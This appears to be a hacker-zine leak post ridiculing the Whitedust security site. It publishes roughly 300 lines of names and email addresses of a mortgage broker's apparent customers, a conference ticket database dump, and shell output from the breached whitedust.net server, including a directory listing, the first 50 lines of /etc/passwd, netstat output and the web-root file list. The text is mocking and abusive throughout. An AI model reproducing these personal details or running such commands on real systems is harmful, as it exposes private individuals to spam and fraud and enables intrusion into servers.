8. Why did I decide to give my money to these chavs in the first place,
especially as they only act as a middle-man for mortgages?
Brenden Kelly has apparently spent 17 years in the financial services
sector, but is new to teh internets!
Yes, this database if full of crap. 27,000 lines of crap. But mixed in all
of that crap there is personal information for all of the customers. We
are not going to do anything malicious with the information at our hands.
But that doesn't mean that nobody else will (or possibly already has).
We feel that this service did a fine job of representing itself as safe,
and users had no specific reason to expect it to get hacked. It is our
opinion that these clients (should they exist) should be contacted and
have the situation explained to them.
If someone would like to take this noble task upon themselves, here is
some contact information. Some of the data has been cutoff and there are
duplicates (why?), but...noone cares.
(@ changed to (a) to limit potential spam :-)
'Sean Keane', 'brendan(a)irelandmortgages.com');
'Maria Hogan & Oliver O Farrell', 'oliver.o\\''farrell(a)smartforc
'Maria Hogan & Oliver O Farrell', 'oliver.o\\''farrell(a)smartforc
'Niamh O Donnell & Liam Lunney', 'niamh.odonnell(a)csplc.com');
'Gemma & Eimear Campion', 'gemma(a)microsoft.com');
'Miceal McEvoy & Lesley Sharvin', 'miceal.f.mcevoy(a)intel.com');
'Grainne O Connor & Sean Leahy', 'groconnor(a)lehman.com');
'Robert O Reilly & Karen Hynes', 'oreilly(a)hp.com');
'Pat Byrne', 'pbyrne(a)rainmaker.ie');
'Niall Kelleher', 'niall(a)combinedlegal.ie');
'Derek Mc Donnell', 'manager.knocklyon(a)superquinn.ie');
'PLACEHOLDER', 'PLACEHOLDER');
'Brendan Kelly', 'brendan(a)irelandmortgages.com');
'PLACEHOLDER', 'PLACEHOLDER');
'Brendan Egan & David White', 'brendan.a.egan(a)intel.com');
'Alison O Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co.uk'
'Alison O Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co.uk'
'Kevin & Catherine Povall', 'kevpovall(a)eircom.net');
'Tom & Aideen Maher', 'tmaher61(a)indigo.ie');
'Joseph McCormack & Eimear Keogh', 'I.keogh(a)dublinpeople.com');
'Mark Geoghegan', 'aquaclean(a)eircom.net');
'Gordon Flood & Sarah Halgarth', 'gordonflood(a)eircom.net');
'Alvin Dagge & Sonya Walshe', 'alvin.dagge(a)geapt.ie');
'Louise Hogan & Colm Devitt', 'louise(a)bluepages.ie');
'Ronan Mulvaney', 'rmulvaney(a)curamsoftware.com');
'Sean & Ciara Leahy', 'seanleahy73(a)hotmail.com');
'Thomas Foley & Claire Hedderman', 'tomf(a)bizquir.ie');
'Shane Kenny & Lisa Kendrick', 'lisakendrick26(a)hotmail.com');
'Suzanne Wren', 'suzanne.wren(a)map.ie');
'Gunther Plank & Bernice Howe', 'Plank_Gun(a)yahoo.ie');
'Kerian Gorey & Claire Moran', 'cmoran(a)kildarecoco.ie');
'Paul Barry', 'pbstbsttdr(a)aol');
'Raymond & Jenny Wallace', 'raymondpwallace(a)eircom.net');
'Fiona Balfe', 'fiona(a)olympia.ie');
'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie');
'Leona Keegan & Ciaran Cullinan', 'leona_keegan(a)ml.com');
'Mary Butler & Ciaran Hughes', 'mary.butler(a)unilever.com');
'Ian Deacon & Anna-Marie Brennan', 'ideac123(a)hotmail.com');
'Gavin Egan', 'gegan01(a)yahoo.com');
'Helene Enberg', 'helene_enberg(a)hotmail.com');
'Michael & Geraldine Littler', '8littleg(a)ie.ibm.com');
'Niamh O Connor & Jonathan Myer', 'niamhoconnor(a)hotmail.com');
'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contechirel
'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contechirel
'Adrian & Ann Marie Phelan', 'aphelan(a)tarasupport.co.uk');
'David Flanagan', 'davidflanagan(a)hotmail.com');
'Patrick & Janet Hobbs', 'pandjhobbs(a)eircom.net');
'Dermot & Lorraine McMullen', 'dermotmcm(a)oceanfree.net');
'Sean Cassidy & Shakris Nelis', 'sean_cassidy(a)ryan-hotels.com');
'Donall & Siobhan Howe', 'howby(a)eircom.net');
'Ciara O Connor & Kevin Nee', 'ciara.oconnor(a)db.com');
'Dermot & Maureen Peakin', 'maureenpeakin(a)hotmail.com');
'Gerry & Marian Murphy', 'cgmurphy.gofree.eircom.ie');
'Stephen & Patricia Beirnes', 'sbeirnes(a)eircom.net');
'Conor Gilmartin & Jennifer Rigault', 'conorg(a)esatclear.ie');
'Caroline Kirwin & Mark Lynch', 'ckirwan(a)eircell.ie');
'Anthony & Ann Burton', 'aburton(a)uprighteuro.com');
'Michael Nolan', 'mnolans(a)eircom.net');
'Evgeny Kudryashov', 'brendan(a)irelandmortgages.com');
'Alan Mooney & Claire Noonan', 'mooneyalan(a)aol.com');
'Elaine O Rourke & Mark Davis', 'elaine(a)tpi.ie');
'Margaret Wade', 'Mwade(a)ait.ie');
'Gus Lynch', 'gus_lynch(a)dell.com');
'Joss Morkens', 'joss(a)iol.ie');
'Test', 'PLACEHOLDER', 'PLACEHOLDER');
'Brendan Quinn & Claire Garvey Quinn', 'brendanquinn(a)hotmail
'Brendan Quinn & Claire Garvey Quinn', 'brendanquinn(a)hotmail
'Karl Dwyer', 'karl.dwyer(a)exel.com');
'Sandra Byrne', 'sandrabyrne(a)frenchassiciates.com');
'Niamh O Connor & Jonathan Myers', 'niamhoconnor(a)thesrgrdup.
'Niamh O Connor & Jonathan Myers', 'niamhoconnor(a)thesrgrdup.
'Jeff Eldridge & Sarah Barry', 'sarah(a)jeffelbridge.com');
'Ciara O Connor & Kevin Nee', 'ciara.oconnor(a)db.com');
'Conor Gilmartin & Jennifer Rigault', 'conorg(a)esatclear.ie')
'Conor Gilmartin & Jennifer Rigault', 'conorg(a)esatclear.ie')
'Gareth Egan & Eileen Mooney', 'egang(a)mortgagelink.ie');
'David Quaid', 'david.quaid(a)escapesoftware.com');
'Brendan Egan', 'brendan.a.egan(a)intel.com');
'Anthony & Susan Dunne', 'anthony.dunne(a)pioneerinvest.ie');
'Stephen & Patricia Beirnes', 'sbeirnes(a)eircom.net');
'Stephen & Lidice Berningham', 'stephen.bermingham(a)connectcg
'Stephen & Lidice Berningham', 'stephen.bermingham(a)connectcg
'Robert O\\''Reilly & Karen Hynes', 'oreilly(a)hp.com');
'Helen Sheridan', 'helenthegreat(a)hotmail.com');
'Stephen Young & Caroline Hughes', 'stephen.young(a)dublin.com
'Stephen Young & Caroline Hughes', 'stephen.young(a)dublin.com
'Joseph & Ann Barry', 'annbarry(a)iolfree.ie');
'Michael & Carmel O\\''Brien', 'm.obrien7(a)networld.ie');
'Morgan Keogh & Hillary Madden', 'hilarymorgan(a)iolfree.ie');
'Gus Lynch', 'gus_lynch(a)dell.com');
'Margaret Prendergast', 'margaret.prendergast(a)ceu.eu.int');
'Kerian Gorey & Claire Moran', 'cmoran(a)kildarecoco.ie');
'Louise Hogan & Colm Devitt', 'louise(a)bluepages.ie');
'Derek McDonnell', 'manager.knocklyon(a)superquinn.ie');
'Winfried Scheidges', 'Ludwin(a)eircom.net');
'Michael & Geraldine Littler', '8littleg(a)ie.ibm.com');
'Catheriona & Colm Molloy', 'Colm.Molloy(a)firstchoice.co.uk')
'Catheriona & Colm Molloy', 'Colm.Molloy(a)firstchoice.co.uk')
'Justice & Lydia Mushayabasa', 'justicemush(a)eircom.net');
'Fergal Finnerty', 'fergalfinnerty(a)yahoo.com');
'Mary Moriarty', 'mmmoriarty(a)hotmail.com');
'Eileen Mooney & Gareth Egan', 'gegan(a)mortgagelink.ie');
'Gordon Flood & Sarah Halgarth', 'gordonflood(a)eircom.net');
'Gerard & Sibolnile Chimbganda', 'gchimnz(a)yahoo.com');
'Gunther Plank & Bernice Howe', 'gunther.plank(a)kti.ie');
'Robert Reddin & Alison Behan', 'robbier(a)bizquip.ie');
'Paul Barry', 'pbstbsttdr(a)aol');
'Mark Geoghegan', 'aquaclean(a)eircom.net');
'Michael Nolan', 'mnolans(a)eircom.net');
'Suzanne Wren', 'suzanne.wren(a)map.ie');
'Raymond & Jenny Wallace', 'raymondpwallace(a)eircom.net');
'Miceal McEvoy & Lesley Sharvin', 'miceal.f.mcevoy(a)intel.com
'Miceal McEvoy & Lesley Sharvin', 'miceal.f.mcevoy(a)intel.com
'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com'
'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com'
'Linda Nolan', 'lindanolan50(a)hotmail.com');
'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c
'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c
'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie
'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie
'Ronan Mulvaney', 'rmulvaney(a)curamsoftware.com');
'Sean & Ciara Leahy', 'seanleahy73(a)hotmail.com');
'Julliana Mullin', 'julie_mullin(a)hotmail.com');
'James & Monica Mullin', 'julie_mullin(a)hotmail.com');
'Rory Conway & Maeve Gromley', 'r_conway(a)vodafone.ie');
'Niamh O\\''Connor & Jonathon Myers', 'niamh.myer(a)cw.com');
'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com
'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com
'Adrian & Anna-Maria Phelan', 'aphelan(a)tarasupport.co.uk');
'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech
'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech
'Yvonne & Karen Dalton', 'remaxroyalcounty(a)eircom.net');
'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com'
'Eugen & Louisa Jaarsveld', 'eugen(a)mauamaraconstruction.com'
'Linda Nolan', 'lindanolan50(a)hotmail.com');
'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c
'Grainne O\\''Connor & Mark O\\''kelly', 'groconnor(a)lehman.c
'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie
'Bruce Crehan & Paula Ryan', 'bruce.crehan(a)falconholidays.ie
'Ronan Mulvaney', 'rmulvaney(a)curamsoftware.com');
'Sean & Ciara Leahy', 'seanleahy73(a)hotmail.com');
'Julliana Mullin', 'julie_mullin(a)hotmail.com');
'James & Monica Mullin', 'julie_mullin(a)hotmail.com');
'Rory Conway & Maeve Gromley', 'r_conway(a)vodafone.ie');
'Niamh O\\''Connor & Jonathon Myers', 'niamh.myer(a)cw.com');
'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com
'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com
'Adrian & Anna-Maria Phelan', 'aphelan(a)tarasupport.co.uk');
'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech
'Lorraine Eagleton & Sylvester Mannion', 'l.eagleton(a)contech
'Yvonne & Karen Dalton', 'remaxroyalcounty(a)eircom.net');
'Helene Enberg', 'helene_enberg(a)hotmail.com');
'Orlaith Egan', 'oegan(a)wccprojectoffice.ie');
'Pauric Reilly', 'pauric.reilly(a)maild.hse.ie');
'Elliott & Eri McNamara', 'elliott.mcnamara(a)intel.com');
'Ita Healy', 'mihealy(a)eircom.net');
'Susan Cosgrove', '5796(a)campus.ie');
'Mary Butler & Ciaran Hughes', 'mary.butler(a)unilever.com');
'Martin Traynor', 'marko1980(a)hotmail.com');
'Ian Deacon & Anna-Marie Brennan', 'ideac123(a)hotmail.com');
'Stephan Davis & Alexia Davy', 'Stephend(a)ocallaghanhotels.ie
'Stephan Davis & Alexia Davy', 'Stephend(a)ocallaghanhotels.ie
'Craig O Brien', 'devers999(a)hotmail.com');
'Anna Connolly', 'connollya(a)eircell.ie');
'Edward Costello', 'eddie.costello(a)esat.com');
'Conor Feeney & Caroline Miskella', 'conor.feeney(a)bankofscot
'Conor Feeney & Caroline Miskella', 'conor.feeney(a)bankofscot
'Gary & Ruth Donnelly', 'gary.donnelly(a)firstactive.com');
'Veronica McHugh', 'vmchugh(a)rotunda.ie');
'Jason Breen & Amanda Brown', 'A.brown(a)frkelly.ie');
'Liam Barry', 'liambarry(a)eircom.net');
'Veronica McHugh', 'vmchugh(a)rotunda.ie');
'Kevin & Catherine Povall', 'kevpovall(a)eircom.net');
'Eimear Keogh', 'e.keogh(a)dublinpeople.ie');
'Maria Hogan & Ollie O Farrell', 'oliver.o\\''farrell(a)smartf
'Maria Hogan & Ollie O Farrell', 'oliver.o\\''farrell(a)smartf
'Patricia Loh & Alan McArdle', 'ploh(a)eircom.ie');
'Louise Hogan', 'louise(a)bluepages.ie');
'Brendan Kelly', 'bwkelly(a)eircom.net');
'Brendan Kelly', 'bwkelly(a)eircom.net');
'Fintan O\\''Connor', 'foconnor(a)esat.ie');
'Ian Hopkins', 'ian.hopkins(a)iec-logistic');
'Denis & Marie Carty', 'Dcarty(a)lgcsb.ie');
'Brian Motherway & Naomi Farrell', 'brian_motherway(a)guinness
'Brian Motherway & Naomi Farrell', 'brian_motherway(a)guinness
'Niall Gormley & Josephine O\\''Reilly', 'newsbase(a)eircom.ne
'Niall Gormley & Josephine O\\''Reilly', 'newsbase(a)eircom.ne
'Sandra Morris', 'smorris(a)bwg.ie');
'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste
'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste
'Lynsey Kenna', 'lkenna(a)woodcomm.ie');
'Gemma Sheridan', 'gsheridan(a)espatial.com');
'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste
'Dominic Moriarity & Najia Saidi', 'moriarDA(a)appliedbiosyste
'Shane Kenny & Lisa Kendrick', 'lisakendrick26(a)hotmail.com')
'Shane Kenny & Lisa Kendrick', 'lisakendrick26(a)hotmail.com')
'Paula Lawlor & David Smith', 'manager.cl(a)firstchoicetravel.
'Paula Lawlor & David Smith', 'manager.cl(a)firstchoicetravel.
'Christopher Kenny & Marie McCaffrey', 'marie.mccaffrey(a)dubl
'Christopher Kenny & Marie McCaffrey', 'marie.mccaffrey(a)dubl
'Fiona Kavanagh', 'rkavan(a)eircom.ie');
'John Devlin & Gemma Woods', 'johndevlin40(a)hotmail.com');
'Robert Archbold & Sandra Morris', 'rarchbold(a)heitons.ie');
'Barry Hearns', 'rkavan(a)eircom.ie');
'John Doherty', 'bussybee(a)milton-institute.ie');
'Niamh O`Donnell & Liam Lunney', 'niamh.odonnell(a)csplc.com')
'Niamh O`Donnell & Liam Lunney', 'niamh.odonnell(a)csplc.com')
'Alison O`Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co
'Alison O`Mahony & Joseph Long', 'alisonomahony2001(a)yahoo.co
'Simon Doherty', 'simondoherty(a)fineos.com');
'Craig O Brien', 'devers999(a)hotmail.com');
'Iulian & Anne Iurascu', 'iurascu(a)eircom.net');
'Diarmuid & Avril McHugh', 'dmchugh(a)mchughgroup.ie');
'Brendan Kelly', 'bwkelly(a)eircom.net');
'Tony & Susan dunne', 'anthony.dunne(a)pioneerinvest.ie');
'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com
'Katie Silcock & Donal Donnelly', 'katie.silcock(a)hotmail.com
'Diarmuid Kelly & Rachel Corcoran', 'diarmuid.kelly(a)piba.ie'
'Diarmuid Kelly & Rachel Corcoran', 'diarmuid.kelly(a)piba.ie'
'Adrian & Anna-Maria Phelan', 'aphelan(a)tarasupport.co.uk');
'Thomas & Margaret Geraghy', 'tommygeraghty(a)gmail.com');
'Mel O Carroll', 'mel_ocarroll(a)ml.com');
'Barry Lonergan & Kelley Mc Donagh', 'barry_lonergan(a)02.ie')
'Barry Lonergan & Kelley Mc Donagh', 'barry_lonergan(a)02.ie')
'Karen Hynes & Robert O reilly', 'oreilly(a)hp.com');
'David O Neill & Eve Mulvaney', 'evemulvaney(a)anpost.ie');
'Shane Sloan', 'Shane.Sloan(a)intel.com');
'Elaine O Rourke & Mark Davis', 'elaine(a)tpi.ie');
'Alan Mooney & Claire Noonan', 'MooneyAlan(a)aol.com');
'Leona Keegan & Ciaran Cullinan', 'leona_keegan(a)ml.com');
'Eamonn Meehan', 'eamonn(a)bordahl.ie');
'Graham & Roslyn Elgie', 'graham.elgie(a)gmail.com');
'Mark & Jane Lawlor', 'janelawlor(a)eircom.net');
'David Healey & Karen McElhinnery', 'david.healey(a)ntl.com');
'Morgan Keogh & Hillary Madden', 'morgan.keogh(a)hughjordan.co
'Morgan Keogh & Hillary Madden', 'morgan.keogh(a)hughjordan.co
'Gavin Egan', 'gegan01(a)yahoo.com');
'Like Carroll & Victoria Vogel', 'victoria.vogel(a)marine.ie')
'Like Carroll & Victoria Vogel', 'victoria.vogel(a)marine.ie')
'James Williams', 'jamesw-tedrum(a)yahoo.ie');
'Damien Hickey', 'damien(a)freewayie.com');
'Joseph Loftus', 'joe.loftus(a)amo-inc.com');
'Sean & Fiona Fennelly', 'sean.b.fennelly(a)intel.com');
'Paul Corcoran & Fiona Moran', 'fiona.moran(a)drm.ie');
'Robert Ennis', 'robennis122(a)hotmail.com');
'Sarah Rogers & Sean Cassidy', 'smith cassidy(a)eircom.net');
' Jacqueline Duggan', 'jackie.duggan(a)firstactive.com');
'Cyril Gordet', 'cyrilgordet(a)hotmail.com');
'Cyril Gordet', 'cyrilgordet(a)hotmail.com');
'Ian Leach', 'ian.leach(a)spcorp.com');
'Tom & Aideen Maher', 'tmaher61(a)indigo.ie');
'Martin & Sinead Finnegan', 'scd141273(a)eircom.net');
'Pat Gallagher', 'pat.gallagher(a)gtm.ie');
'Ciaran Fitzpatrick', 'ciaranfitzpatrick(a)hotmail.com');
'Windsor Landan & Stephanie Ennis', 'windsor(a)iolfree.ie');
'Dermot & Marueen Peakin', 'marueenpeakin(a)hotmail.com');
'Fintan O Connor & Eavan Breslin', 'Foconnor(a)esat.ie');
'Stewart Steele', 'stewart.steele(a)siemens.ie');
'Gunther Plank & Bernice Howe', 'Plank_Gun(a)yahoo.ie');
'Gerry & Marian Murphy', 'cgMruphy.gofree.eircom.ie');
'Sean Cassidy & Shakira Nelis', 'sean_cassidy(a)ryan-hotels.co
'Sean Cassidy & Shakira Nelis', 'sean_cassidy(a)ryan-hotels.co
'Patrict & Janet Hobbs', 'PandJhobbs(a)eircom,net');
'Donal & Siobhan Howe', 'howby(a)eircom.net');
'Anthony & Ann Burton', 'aburton(a)uprighteuro.com');
'Dermot & Lorraine McMullan', 'Dermotmcm(a)oceanfree.net');
'Carmel McManus', 'carmel_mcmanus(a)entemp.ie');
'Liam & Jean Keane', 'liam.keane(a)tecnomen.ie');
'Claire Gillard & Billy Foley', 'claire.gillard(a)yahoo.com');
'Noelle McCabe & James King', 'noelle.mccabe(a)connectcgs.com'
'Noelle McCabe & James King', 'noelle.mccabe(a)connectcgs.com'
'Gerry & Clare Nolan', 'gerry.nolan(a)investec.ie');
'Ciara & Stephen O\\''Brien', 'ciara_davis(a)hotmail.com');
'John & Aine Godson', 'john.godson(a)aramco.com');
'Dr Pradeep & Rita Chadha', 'chadhap(a)indigo.ie');
'Stephen Moran & Amanda Daunt', 'Stephen.Moran(a)permanenttsb.
==The Black and White Ball
Some of you may remember this ill-fated attempt to make money. In February
2007 Whitedust announced they were hosting a hacker conference in
September. It was to be split into "Whitehat" and "Blackhat" sections. In
July the website changed to a one-page message saying that the conference
had to be cancelled due to banking difficulties. The duo then proceeded to
never mention the conference again.
For anybody suspicious about this, here is the real reason the B&W Ball
had to be cancelled:
--
-- Table structure for table `bw_tickets`
--
CREATE TABLE `bw_tickets` (
`TicketID` bigint(10) NOT NULL auto_increment,
`TicketRand` varchar(15) default NULL,
`Name` varchar(100) default NULL,
`Company` varchar(100) default NULL,
`Address` text,
`Telephone` varchar(100) default NULL,
`Fax` varchar(100) default NULL,
`Email` varchar(100) default NULL,
`fAllAccess` tinyint(1) default NULL,
`fWhite` tinyint(1) default NULL,
`fBlack` tinyint(1) default NULL,
PRIMARY KEY (`TicketID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=4 ;
--
-- Dumping data for table `bw_tickets`
--
INSERT INTO `bw_tickets` VALUES (1, '123456789012345', 'Mark Anderson',
'Mercury Software', NULL, NULL, NULL, NULL, 1, 0, 0);
INSERT INTO `bw_tickets` VALUES (2, '253453453645645', 'Mark Hinge',
'Pirates Inc.', NULL, NULL, NULL, NULL, NULL, 1, NULL);
INSERT INTO `bw_tickets` VALUES (3, '563524352342343', 'Peter Prickett',
'Pricket & Co', NULL, NULL, NULL, NULL, NULL, NULL, 1);
-- --------------------------------------------------------
That's right, the only tickets they "sold" were to Cronus, psg, and
chickensoup.
Check out how Peter Prickett is the blackhat of SoL.
Is it just me or were the talks on the blackhat panel no different from
the talks on the whitehat panel?
Why did the ball find itself so unpopular? Let's suggest some points:
- It was hosted over four days. This was probably to get as much money as
possible from attendees drinking.
- Only one talk running at a time.
- It held only 20 talks in total.
- These talks were lame.
- You could see half the speakers in Defcon.
- They stole the name from Defcon.
- Whitedust has no credibility.
- Whitedust's legions of 14 year old virgins/wannabes/php coders can't
afford a con
- People in the security industry don't want to go to a conference with no
new material
- The cost was 320 euros!
psg lacks understanding - "You'd spend that much if you went to the black
hat briefings though... the difference between a corporate conference and
the defcon side event... and B&W is longer."
Sure, you could pay less to go for only two days and see half the shitty
talks. Or you could pay 1/5 of the price to go to Defcon and see many more
talks, generally of a higher quality, and be able to choose what to see
out. The quality of talk at the B&W Ball called for a small entrance fee,
if you are in the 320 euro range then you need to have a higher quality of
talks, or at least something new, to attract corporate slaves.
All of the speakers either signed up for the free trip or because they
wanted to pad their resume with yet another talk this year.
Of course, this could easily be an area where the Whitedust folks lie about,
because it is kind of embarassing. Maybe they'll say that people could not
be added until the banking issues were cleared up, and that these were
only free tickets. However, the link for Tickets was still up, with an email
address to contact to arrange financial information. Can anyone say they
actually tried that, and were told to wait a bit while details were sorted
out?
==whitedust.net
Here comes your fun. The big WD itself.
$ ls -la /
drwxr-xr-x 25 root root 4096 Apr 12 11:48 .
drwxr-xr-x 25 root root 4096 Apr 12 11:48 ..
-rw------- 1 root root 23552 Aug 3 11:47 aquota.group
-rw------- 1 root root 24576 Aug 3 11:47 aquota.user
-rw-r--r-- 1 root root 0 Mar 10 15:49 .autofsck
drwxr-xr-x 2 root root 4096 Jun 27 04:04 bin
drwxr-xr-x 3 root root 4096 Mar 10 15:47 boot
drwxr-xr-x 9 root root 4520 Jun 26 15:13 dev
drwxr-xr-x 66 root root 12288 Aug 3 10:25 etc
drwx--x--x 877 root root 20480 Aug 2 20:52 home
drwxr-xr-x 2 root root 4096 Aug 12 2004 initrd
drwxr-xr-x 12 root root 4096 Aug 1 04:06 lib
drwx------ 2 root root 16384 Mar 9 23:07 lost+found
drwxr-xr-x 3 root root 4096 Jun 26 15:13 media
drwxr-xr-x 2 root root 4096 Apr 11 20:27 misc
drwxr-xr-x 2 root root 4096 Aug 12 2004 mnt
drwxr-xr-x 2 root root 4096 Apr 26 15:25 opt
dr-xr-xr-x 481 root root 0 Mar 10 15:49 proc
drwxr-x--- 10 root root 4096 Jul 27 13:59 root
drwxr-xr-x 2 root root 12288 Jul 3 04:04 sbin
drwxr-xr-x 2 root root 4096 Mar 9 23:09 selinux
drwx------ 2 root root 4096 Mar 12 04:17 .spamassassin
drwxr-xr-x 2 root root 4096 Aug 12 2004 srv
drwxr-xr-x 9 root root 0 Mar 10 15:49 sys
-rw-r--r-- 1 root root 77258 Apr 12 11:44 temp.txt
drwxrwxrwt 8 root root 888832 Aug 3 12:45 tmp
drwxr-xr-x 2 root root 4096 Apr 1 10:30 update
drwxr-xr-x 17 root root 4096 Mar 10 16:52 usr
drwxr-xr-x 23 root root 4096 Mar 12 11:07 var
$ head -50 /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:500:501::/home/admin:/bin/bash
dovecot:x:104:104::/home/dovecot:/bin/bash
clamav:x:501:502:ClamAV User:/home/clamav:/bin/bash
testerdoma:x:502:503::/home/testerdoma:/bin/false
hola123456:x:503:504::/home/hola123456:/bin/false
qetuoa:x:504:505::/home/qetuoa:/bin/bash
mark:x:505:506::/home/mark:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
olympus:x:506:507::/home/olympus:/bin/false
kieranl:x:507:508::/home/kieranl:/bin/false
termad:x:508:509::/home/termad:/bin/false
dairymaste:x:509:510::/home/dairymaste:/bin/false
ballyduff:x:510:511::/home/ballyduff:/bin/false
dairyking:x:511:512::/home/dairyking:/bin/false
emagri:x:512:513::/home/emagri:/bin/false
imqcs:x:513:514::/home/imqcs:/bin/false
In case anyone was wondering, their sshd is full "Privilege-separated"!
Thanks, host, for descriptive names.
$ wc -l /etc/passwd
907 /etc/passwd
$ netstat | head -30
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State
tcp 0 0 lala.blacknight.ie:11553 *:*
LISTEN
tcp 0 0 *:1505 *:*
LISTEN
tcp 0 0 *:rwhois *:*
LISTEN
tcp 0 0 *:imaps *:*
LISTEN
tcp 0 0 *:pop3s *:*
LISTEN
tcp 0 0 *:smux *:*
LISTEN
tcp 0 0 *:mysql *:*
LISTEN
tcp 0 0 *:submission *:*
LISTEN
tcp 0 0 *:2222 *:*
LISTEN
tcp 0 0 *:pop3 *:*
LISTEN
tcp 0 0 *:imap *:*
LISTEN
tcp 0 0 *:http *:*
LISTEN
tcp 0 0 gorlois.blacknight.ie:http
adolfo-icatm106728-la:49217 SYN_RECV
tcp 0 0 gorlois.blacknight.ie:http
host86-141-170-77.rang:3622 SYN_RECV
tcp 0 0 gorlois.blacknight.ie:http coopzoo178.ucc.ie:4751
SYN_RECV
tcp 0 0 *:ftp *:*
LISTEN
tcp 0 0 252-101.colo.sta.bla:domain *:*
LISTEN
tcp 0 0 252-99.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-98.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-97.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-96.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-95.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-92.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-93.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 252-89.colo.sta.blac:domain *:*
LISTEN
tcp 0 0 gorlois.blacknight.i:domain *:*
LISTEN
tcp 0 0 lala.blacknight.ie:domain *:*
LISTEN
tcp 0 0 lala.blacknight.ie:domain *:*
LISTEN
That's just to give you an idea of the server they are hosted on. We don't
have root, and there was no need to get it.
$ ls
1.css blackdust cp_changepassword.php
cp_managesections.php filter.php login.php search.php
404handler.php cache cp_createpage.php cp_newsreader.php
images logout.php sections.php
archive.php captcha cp_deletenews.php cp_postnews.php
inc-footer.php Mail sessions
awstats cgi-bin cp_deletepage.php
cp_postsidenews.php inc-header.php Mail.php shop
backup20070105 common cp_editnews.php cronusblogimages
index.php PEAR.php viewnews.php
backup20070717 controlpanel.php cp_editpage.php data_referers.txt
labs publishing viewpage.php
$ ls awstats/
bookmarks.html
$ perl -lne 'print $1 if m!"(http://[\w-./]+)"!;'
awstats/bookmarks.html
http://www.textscene.com/
http://www.neworder.box.sk/
http://antionline.com/
http://www.evilhosting.org/
http://reallifecomics.com/
http://www.clutzed.com/
http://www.hungryhacker.com/
http://www.thegreatone.me.uk/
http://www.steinsky.me.uk/
http://www.infectedloser.com/
http://www.whitedust.net/
http://slashdot.org/
http://www.topix.net/tech/computer-security
http://news.zdnet.co.uk/internet/security/
http://www.theregister.co.uk/
http://www.computerworld.com/
http://www.securityfocus.com/
http://www.eweek.com/
http://www.indymedia.org.uk/en/regions/london/
http://www.wbglinks.net/
http://www.macnewsworld.com/
http://www.linuxsecurity.net/
http://packetstormsecurity.nl/
http://news.bbc.co.uk/
http://www.internetsecuritynews.com/
http://www.securitypipeline.com/
